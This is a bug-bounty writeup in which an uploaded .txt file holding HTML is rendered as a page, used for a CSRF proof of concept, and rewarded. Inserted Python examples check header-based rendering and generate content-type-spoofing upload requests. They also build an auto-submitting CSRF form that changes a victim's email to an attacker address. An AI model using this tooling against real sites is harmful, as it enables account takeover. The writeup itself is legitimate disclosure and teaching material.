Basically, the breakthrough is pretty simple: upload a .txt file whose contents are HTML, and the server serves tmp.txt in a way the browser renders as an HTML page. That is what makes further exploitation possible.

I was testing the file upload functionality; I tried many extensions and bypasses but failed! There was a feature for uploading .txt files, and the server allowed it.

Why does the TXT file act as an HTML file?

  • Is this happening because of the contents inside the .txt file?

This could be.

  • Is this happening because of .htaccess?

Maybe

After exploiting this .txt-as-.html issue, I now always test for this vulnerability. To be honest, I have found two more since then.
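The questions above can be settled without guessing: what decides whether a browser renders an uploaded "text" file as HTML is the Content-Type (and X-Content-Type-Options) the server sends back when the file is fetched, not the extension in the URL. The following is an added Python example, not code from the original writeup: it takes the response headers and first bytes as captured in Burp and says whether the page will render, using a simplified version of the WHATWG MIME sniffing rules. The four sample responses for tmp.txt are constructed for the example.

```python
# Added example (not the author's code). Decides whether a browser will treat the
# response for an uploaded file as an HTML document. Simplified model of the
# WHATWG MIME Sniffing Standard; the SAMPLES below are constructed, not captured.
import re

# Tag names the sniffing algorithm looks for in the first 512 bytes.
HTML_START = re.compile(
    rb"^\s*<(?:!doctype html|html|head|script|iframe|h1|div|font|table|a|style"
    rb"|title|b|body|br|p|!--)[\s>]",
    re.IGNORECASE,
)
# Declared types that browsers are allowed to sniff.
SNIFFABLE = {"", "unknown/unknown", "application/unknown", "*/*"}


def will_render_as_html(headers: dict, body: bytes) -> tuple[bool, str]:
    """Return (renders_as_html, reason) for the response that serves the upload."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    disposition = h.get("content-disposition", "").strip().lower()

    if disposition.startswith("attachment"):
        return False, "Content-Disposition: attachment forces a download"
    if ctype == "text/html":
        return True, "served as text/html, so the extension in the URL is irrelevant"
    if nosniff:
        return False, f"nosniff set: declared type {ctype or '(none)'} is honoured"
    if ctype in SNIFFABLE:
        if HTML_START.match(body[:512]):
            return True, "no usable Content-Type: browser sniffs and finds an HTML tag"
        return False, "no usable Content-Type, but body does not start with an HTML tag"
    if ctype == "text/plain":
        return False, "text/plain is not sniffed up to HTML by current browsers"
    return False, f"declared type {ctype} is not text/html"


# The payload from the writeup, and constructed responses for GET /uploads/tmp.txt.
PAYLOAD = b"<title>PoC by @eternyle</title> <h1>PoC by @eternyle</h1>"
SAMPLES = {
    "served_as_html": ({"Content-Type": "text/html; charset=utf-8"}, PAYLOAD),
    "no_content_type": ({"Server": "nginx"}, PAYLOAD),
    "plain_with_nosniff": (
        {"Content-Type": "text/plain", "X-Content-Type-Options": "nosniff"},
        PAYLOAD,
    ),
    "forced_download": (
        {"Content-Type": "text/html", "Content-Disposition": "attachment; filename=tmp.txt"},
        PAYLOAD,
    ),
}


def triage(samples=SAMPLES) -> dict:
    """Map each captured response to a render verdict."""
    return {name: will_render_as_html(h, b)[0] for name, (h, b) in samples.items()}


if __name__ == "__main__":
    for name, (h, b) in SAMPLES.items():
        verdict, why = will_render_as_html(h, b)
        print(f"{name:20} -> {'RENDERS' if verdict else 'safe':7} ({why})")
```

Only the first two samples render: a server that labels the stored file text/html, or one that sends no Content-Type and lets the browser sniff. The last two show the two fixes a vendor usually ships, nosniff with an honest text/plain type, or forcing a download.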

What was inside the .txt file?

<title>PoC by @eternyle</title> <h1>PoC by @eternyle</h1>

PoC?


After that, I tried PHP. Unfortunately, there was a strong WAF and I was not able to bypass the filter to execute a PHP file. I saw that I could use JavaScript code too, but it was limited.

After that, I tried to load API endpoints inside an <iframe> tag, but unfortunately there was no sensitive endpoint from which I could load JSON data and exploit it in a different way to steal it. :)

All I could do was take advantage of the HTML and build a CSRF exploit to make the report juicier!

After reporting the issue I was awarded 200 USD, and the vulnerability has been fixed.


Thoughts

How do I always test for unrestricted file upload vulnerabilities? (Basics only)

First things first: I go for simple extensions.

If that does not work, I try uploading with other extensions. Basically, I send the upload request to Burp Suite Intruder, add a few common extensions as the payload list, and run the attack. If I am lucky, I may get something.

What is inside the file you're uploading?

Here comes the question of file contents. Do you think, before uploading the file, about what is really inside it? For HTML, what have you put inside the file?

I have seen many times that the server refuses the upload if the file contains any suspicious title, tag, or piece of code. So, at the first stage of file upload testing, I start from the very basics.

For example, if I am trying to upload an HTML or PHP file, I do not add any code at first. Instead of code, I put in normal text to make sure the extension gets through. Once the extension works, I can go further.
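The two-stage approach just described (harmless text under every candidate extension first, real HTML only for the extensions that were accepted) together with the CSRF page mentioned earlier, as an added Python example that is not the author's code. The extension list, the tmp. filename, the upload field name and the target form action are assumed placeholders. The multipart body is built by hand so that the part's own Content-Type can be set independently of the filename, which matters against filters that check that header rather than the extension.

```python
# Added example (not the author's code). Builds the upload requests in the order
# the writeup describes, plus the self-submitting CSRF page to host once a
# "text" file is known to render as HTML. Filenames, field names and the target
# action below are assumed placeholders.
import html

EXTENSIONS = ["txt", "html", "htm", "xhtml", "svg", "php", "phtml", "php5"]  # assumed list
BENIGN = b"upload test, plain text only"  # stage 1 content: nothing for a WAF to match


def csrf_poc(action: str, fields: dict, method: str = "POST") -> str:
    """Auto-submitting form, hosted in the uploaded file that the server renders as HTML.
    Field names/values are escaped so a quote in a value cannot break the markup."""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<html><body>"
        f'<form id="f" action="{html.escape(action, quote=True)}" method="{method}">'
        f"{inputs}</form>"
        "<script>document.getElementById('f').submit()</script>"
        "</body></html>"
    )


def multipart(field: str, filename: str, content: bytes, part_type: str,
              boundary: str = "----WebKitFormBoundaryExample") -> tuple:
    """Return (Content-Type header value, body) for a single-file multipart upload."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {part_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def stage1(extensions=EXTENSIONS) -> list:
    """Stage 1: the same harmless text under every extension, honestly typed.
    Each tuple is (filename, content, part Content-Type)."""
    return [(f"tmp.{ext}", BENIGN, "text/plain") for ext in extensions]


def stage2(accepted: list, poc_html: str) -> list:
    """Stage 2: real HTML only for extensions accepted in stage 1, sent once with an
    honest part type and once claiming text/plain in case the filter keys on it."""
    out = []
    for ext in accepted:
        for part_type in ("text/html", "text/plain"):
            out.append((f"tmp.{ext}", poc_html.encode(), part_type))
    return out


if __name__ == "__main__":
    # Assumed target: a state-changing endpoint with no CSRF token.
    poc = csrf_poc("https://target.example/account/email", {"email": "attacker@example.com"})
    for filename, content, part_type in stage1() + stage2(["txt"], poc):
        ctype, body = multipart("file", filename, content, part_type)
        print(f"{filename:10} part={part_type:10} body={len(body)} bytes  (request Content-Type: {ctype})")
```

Each tuple from stage1() and stage2() maps onto one Intruder request; only the filename and, in stage 2, the part Content-Type change between them, which is what keeps the result interpretable when one of them is accepted.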


See you in the next article; until then, stay tuned. Thank you very much for reading.